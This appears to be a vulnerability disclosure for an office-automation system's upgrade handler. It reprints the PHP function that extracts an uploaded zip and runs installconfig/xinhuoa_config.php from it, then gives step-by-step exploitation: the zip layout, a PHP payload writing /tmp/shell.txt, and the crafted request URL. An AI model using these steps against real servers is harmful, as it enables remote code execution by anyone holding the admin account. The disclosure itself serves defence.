Preconditions:
-
An administrator account whose admin id is 1
-
rockinzip
is configured as true in /config/config.php
Affected location:
version <= 2.6.0, in /webmain/system/upgrade/upgradeAction.php
First, the code, reformatted:
function loadinstallinfoAjax
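/**
 * Ajax handler: inspect an installation package and return a summary of it.
 *
 * The package is located through the base64-encoded GET parameter "path". A
 * numeric value is treated as a plugin-market id and fetched via the xinhuapi
 * service; any other value is treated as a local zip file, which is only
 * accepted when the "rockinzip" config switch is on.
 *
 * Every entry of the package is written below UPDIR/logs/<md5(path)>, and then
 * installconfig/xinhuoa_config.php from that directory is loaded with require().
 * That file is PHP taken from the package, so whoever can supply the package
 * can run code on the server; the admin-id-1 gate at the top is the only
 * barrier. NOTE(review): only packages from a trusted origin should reach this
 * method -- verifying a package signature before extraction is the proper fix
 * and is not implemented here.
 *
 * @return array returnsuccess() payload describing the package, or a
 *               returnerror() payload on any failure.
 */
public function loadinstallinfoAjax()
{
    if (getconfig('systype') == 'demo') return returnerror('演示不要操作');
    if ($this->adminid != 1) return returnerror('不是管理员不要操作');

    $nwsp = $this->get('path');
    $nwsp = $nwsp ? $this->jm->base64decode($nwsp) : '';
    if (isempt($nwsp)) return returnerror('无效安装');

    if (is_numeric($nwsp)) {
        // Plugin-market package: contents come from the xinhuapi service.
        $barr = c('xinhuapi')->getdata('other', 'instinfo', array('id' => $nwsp,));
        if (!$barr['success']) return $barr;
        $farr     = $barr['data']['farr'];
        $filesize = $barr['data']['filesize'];
    } else {
        // Local zip: the decoded value is used as a server-side filesystem path.
        if (!getconfig('rockinzip')) return returnerror('系统未开启此功能');
        // Only a regular file can be an archive; this also keeps filesize()
        // from running on a missing path. NOTE(review): restricting the path
        // to UPDIR would be stricter -- not enforced here because legitimate
        // packages may sit elsewhere; confirm against the callers.
        if (!is_file($nwsp)) return returnerror('无效安装');
        $farr = c('zip')->zipget($nwsp);
        if (!is_array($farr)) return returnerror($farr);
        $filesize = filesize($nwsp);
        if ($filesize === false) $filesize = 0;
    }

    $path     = '' . UPDIR . '/logs/' . md5($nwsp) . '';
    $filestr  = '';
    $agentstr = '';
    $tablestr = '';
    $menustr  = '';
    foreach ($farr as $k => $rs) {
        $_pluj = isset($rs['filepath']) ? (string)$rs['filepath'] : '';
        $conts = isset($rs['filecontent']) ? $rs['filecontent'] : '';
        // Entry names are taken verbatim from the archive. Refuse absolute
        // paths, drive letters, ".." segments and NUL bytes so that no entry
        // can be written outside $path (zip-slip); a tampered package fails
        // as a whole instead of being partially extracted.
        $norm = str_replace('\\', '/', $_pluj);
        if ($norm === ''
            || $norm[0] === '/'
            || strpos($norm, "\0") !== false
            || preg_match('#^[A-Za-z]:#', $norm)
            || preg_match('#(^|/)\.\.(/|$)#', $norm)) {
            return returnerror('无效安装');
        }
        $spath = $path . '/' . $_pluj;
        if (!contain($_pluj, 'installconfig')) {
            $filestr .= '' . $_pluj . '<br>';
            // Outside installconfig/ only images are materialised; every other
            // entry is merely listed.
            $fileext = substr($_pluj, -3);
            if ($fileext == 'jpg' || $fileext == 'png' || $fileext == 'gif') {
                if ($conts) $this->rock->createtxt($spath, base64_decode($conts));
            }
        } else {
            $this->rock->createtxt($spath, base64_decode($conts));
        }
    }

    $confpath = $path . '/installconfig/xinhuoa_config.php';
    // Same error envelope as the other branches; the previous bare-string
    // return also disclosed the server-side path to the client.
    if (!file_exists($confpath)) return returnerror('无效安装包');
    // Executes PHP shipped inside the package -- see the docblock.
    $conf = require($confpath);
    if (!is_array($conf)) return returnerror('无效安装包');

    $modepath  = $path . '/installconfig/xinhuoa_data.json';
    $mysqlpath = $path . '/installconfig/xinhuoa_mysql.json';
    $modestr   = '';
    $menuarr   = array();
    if (file_exists($modepath)) {
        $dsta = json_decode(file_get_contents($modepath), true);
        // Malformed JSON decodes to null; treat it as "nothing to list".
        if (!is_array($dsta)) $dsta = array();
        if (isset($dsta['mode']) && is_array($dsta['mode'])) {
            foreach ($dsta['mode'] as $bh => $info) {
                $modestr .= '' . $info['flow_set']['name'] . '(' . $bh . ') ';
            }
        }
        if (isset($dsta['menu']) && is_array($dsta['menu'])) {
            foreach ($dsta['menu'] as $cd => $cdrs) {
                if ($cd > 0) $menustr .= '<div style="margin:5px 0px" class="blank1"></div>';
                $menustr .= '<input class="btn btn-default btn-xs" click="xuancaid,' . $cdrs['id'] . '" type="button" value="选上级菜单"><br>' . $cdrs['name'] . '(' . $cdrs['url'] . ')';
                $menuarr[$cdrs['id']] = '-1';
                if (isset($cdrs['children']) && is_array($cdrs['children'])) {
                    foreach ($cdrs['children'] as $cd1 => $cdrs1) {
                        $menustr .= '<br> ┣' . $cdrs1['name'] . '(' . $cdrs1['url'] . ') ';
                        if (isset($cdrs1['children']) && is_array($cdrs1['children'])) {
                            foreach ($cdrs1['children'] as $cd2 => $cdrs2) {
                                $menustr .= '<br> ┣' . $cdrs2['name'] . '(' . $cdrs2['url'] . ') ';
                            }
                        }
                    }
                }
            }
        }
        if (isset($dsta['yydata']) && is_array($dsta['yydata'])) {
            foreach ($dsta['yydata'] as $yb => $ybrs) {
                // NOTE(review): $path is the extraction directory on disk, so the
                // src below is a filesystem path, not a URL -- confirm how the
                // front end resolves it.
                $agentstr .= '<img src="' . $path . '/' . $ybrs['data']['face'] . '" align="absmiddle" width="20px" height="20px">' . $ybrs['data']['name'] . ' ';
            }
        }
    }

    if (file_exists($mysqlpath)) {
        $dstd = json_decode(file_get_contents($mysqlpath), true);
        if (is_array($dstd)) {
            foreach ($dstd as $dbs => $nse) {
                $tablestr .= ',' . $dbs . '';
            }
        }
    }
    if ($tablestr) $tablestr = substr($tablestr, 1);

    $conf['modestr']    = $modestr;
    $conf['filestr']    = $filestr;
    $conf['tablestr']   = $tablestr;
    $conf['menustr']    = $menustr;
    $conf['agentstr']   = $agentstr;
    $conf['menuarr']    = $menuarr;
    $conf['pathstr']    = $this->jm->base64encode($nwsp);
    $conf['filesizecn'] = $this->rock->formatsize($filesize);
    return returnsuccess($conf);
}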
The first precondition is an account with adminid=1
![image](https://private-user-images.githubusercontent.com/142081882/285372134-06c98e79-133f-480f-ad07-6b8531358753.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzcyMTM0LTA2Yzk4ZTc5LTEzM2YtNDgwZi1hZDA3LTZiODUzMTM1ODc1My5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04YWRkZWIwZDc0NDIzNzhkYjE3ZTVkNTg5ODgxZWNkYTViOGVlYWRiYTk2NTQwZGEzZmNkNTM2NjA3OWM0NmIyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.EkwWQv4QgO8D_Xs-LZAH9Mk5VeSBHfZfmiFp4ed46kQ)
When a GET parameter path is supplied, this function base64-decodes it and checks whether the result is a numeric string. If it is, the function calls the vendor's API to download the package from the plugin market. If it is not, the function checks whether rockinzip is configured as true in /config/config.php; if so, the zipget function is called to decompress the file. This is where the second precondition comes from: the rockinzip value in the config must be true.
![image](https://private-user-images.githubusercontent.com/142081882/285372305-151797c2-f512-443e-bbc3-450f13cc9a11.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzcyMzA1LTE1MTc5N2MyLWY1MTItNDQzZS1iYmMzLTQ1MGYxM2NjOWExMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lN2I3MjUxNjU2NTFjODA5MGVjOGE2OTc5YzJjODYzY2RiNGNlODlkZmE0MmUyZGJlYjc2YTBlYzk2ZDJlMjk2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.AgJ8TJgPm5Ty1nRel4KK0_aKYtb5QNWgPz6imvKjLQQ)
The zipget function
unzips the archive, but each file's content is returned base64-encoded
/include/chajian/zipChajian.php
![image](https://private-user-images.githubusercontent.com/142081882/285373516-09496f75-9395-4140-82d2-dc7473592665.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzczNTE2LTA5NDk2Zjc1LTkzOTUtNDE0MC04MmQyLWRjNzQ3MzU5MjY2NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xMzU4ODk1NTNkZTQyMjVlMWJhYWE2NmQyMWNmZTMxNzkxNDJkZjFlMTEzNDUyZTdjOGJmZGQ3M2I1OTM1NWVlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.2u-wxeIkZwwTJ5KL81BYhRXZ-eSOFlOBdMLSTgM3DjM)
That is fine, because loadinstallinfoAjax base64-decodes each file's content further down before writing it; the files are written under '' . UPDIR . '/logs/' . md5($nwsp) . ''
![image](https://private-user-images.githubusercontent.com/142081882/285374029-e44b16d0-048c-4213-a012-e031b6cedd13.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc0MDI5LWU0NGIxNmQwLTA0OGMtNDIxMy1hMDEyLWUwMzFiNmNlZGQxMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYWZmMDEwYWEwNDY4MmZlN2MyYjVmZjQ0ZmM1NzJhYjY3NTA2NTY3MDQ4NmFjOWFlMjkwZjczMWIzYTczOGZiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.GNCZcyTACcT-ULK_CO0gV4AedgL_x_ZodHPJldIHo8w)
This looks cumbersome but is harmless. The interesting part comes next.
After the archive is decompressed (decoded) and written to '' . UPDIR . '/logs/' . md5($nwsp) . ''
, the function checks whether a $path . '/installconfig/xinhuoa_config.php'
file exists. If it does, that file is included
![image](https://private-user-images.githubusercontent.com/142081882/285374369-fcc8794c-f7fc-4921-a849-f3883c0a4702.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc0MzY5LWZjYzg3OTRjLWY3ZmMtNDkyMS1hODQ5LWYzODgzYzBhNDcwMi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zODJmMTNjYzdlNWEyYWVjMzFhMGFlYjNkMGU2ODQ1MDUzZTFlYTVmOThiZTBmZjJjZjU4YWUyMTA3NWZmY2QyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.0NdlzaDUn1S965z-huocuWD_kbeZwhlIZu0EZd7EyQ0)
How to use
make a zip
|-installconfig
....|-xinhuoa_config.php
put content to xinhuoa_config.php
<?php
file_put_contents("/tmp/shell.txt", "ok");
first, upload this compressed package anywhere and obtain the upload path
![image](https://private-user-images.githubusercontent.com/142081882/285375655-a8fdc07f-d674-431d-8474-bb50f24e4f37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1NjU1LWE4ZmRjMDdmLWQ2NzQtNDMxZC04NDc0LWJiNTBmMjRlNGYzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iN2Q3MTcxMjdmNDZlN2NkZDllY2UyMTk5OTQwZDUxNzgxYmY3ZjQ0ZTNjZTg5ZjRmNTM5YzI1ZjI4ZmYwM2QxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.8VTGtaWTO9Ox-MrYGREK1Y8CWA4yn7nddeF35A1orNY)
base64 encode file path
![image](https://private-user-images.githubusercontent.com/142081882/285375803-3def2689-c68f-40a2-92e3-9a7100398d37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1ODAzLTNkZWYyNjg5LWM2OGYtNDBhMi05MmUzLTlhNzEwMDM5OGQzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wZDA3MWU3NjI3ZDFmMDI0MTdjNjljNGEyYWZhM2FkMmVmMzAwNzU4MjA4Yjc2OTI5YWY4MWVhMGRiMDJkZmQ5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.d_rqu2R3suKjo3JDWQ_acV8pkxBQeC5QUc4GXtoCppw)
request /index.php?a=loadinstallinfo&m=upgrade&d=system&ajaxbool=true&rnd=39613&path=FILE_PATH_BASE64_ENCODE
![image](https://private-user-images.githubusercontent.com/142081882/285375968-f0daa19c-a7d4-4573-a7e1-0b2fe6a200ca.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1OTY4LWYwZGFhMTljLWE3ZDQtNDU3My1hN2UxLTBiMmZlNmEyMDBjYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00NDE0YzAxMzgxOGNjNzE3MjBhYjdiNzUyNDY2ZWVkNzIwZWZmNzc2MmEyNGY1MzBiYmFjOGNhOGViYTQyZjYyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.DbHc8GaZfUMHDNikWtIvDquNoDzXXIAX9nTjgvHmWsE)
Our code has been executed and /tmp/shell.txt has been written
![image](https://private-user-images.githubusercontent.com/142081882/285376132-898fe314-e0b9-4196-b165-96ce2aba7116.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc2MTMyLTg5OGZlMzE0LWUwYjktNDE5Ni1iMTY1LTk2Y2UyYWJhNzExNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04ZGU3ZGNkYTcxZjk5ZmQ4OTk5ZTJlYWRkNmUzZGE1NjJiODY1YjUzNGI4ZjhlZTBiMzUzZWRhZTM0YzUwZjRiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ucmKh51zDnCuniJW6XtmDC5yklC_MxsXr-5eNmayLXI)